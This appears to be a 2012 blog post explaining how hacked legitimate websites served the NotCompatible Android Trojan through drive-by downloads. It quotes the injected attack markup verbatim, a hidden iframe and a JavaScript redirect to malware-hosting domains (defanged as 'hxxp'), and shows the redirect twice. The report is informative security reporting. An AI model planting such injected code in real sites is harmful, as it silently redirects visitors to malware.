It might be safe to say that April 2012 will go down in
history as the month we realized Macs are not virus-proof. If that’s the case, then May 2012 will go down as the
month we realized smartphones aren’t safe either.
<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>
For the first time, experts have located legitimate sites
that have been hacked and infected with Android drive-by-download malware.
“Drive-by-download” malware is harmful software that is
automatically downloaded when a particular website is visited. In this case,
the malware, a Trojan called NotCompatible, specifically infects Android
devices. It’s important to note that the relevant piece of this story is the
fact that the malware was found on legitimate websites that had been hacked and
infected.
Hacked websites commonly have the following code inserted into
the bottom of each page:
<iframe style="visibility: hidden; display: none; display: none;" src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
<iframe style="visibility: hidden; display: none; display: none;" src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
When a PC-based web browser accesses the site in question, it
returns a “not found” error. When a browser with the word “Android” in its user-agent
header accesses the site, however, the following is returned:
<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>
As a result, the browser immediately attempts to access the
page at androidonlinefix.info. Like the previous site, only browsers with the
word “Android” in their user-agent string will trigger a download; all other
browsers will show a blank page. Since the server returns an Android app, the
Android browser automatically downloads it. [ZDNet]
Up until now, the Android DBD Malware had been found only on
websites designed by malware distributors specifically for the purpose of
hosting the program. The fact that the software is now found on legitimate
websites opens the door for large-scale infections.
Presently, the malware presents no known negative effects,
but experts believe the current infections are part of a trial run to test the
viability of mass distribution.
No comments:
Post a Comment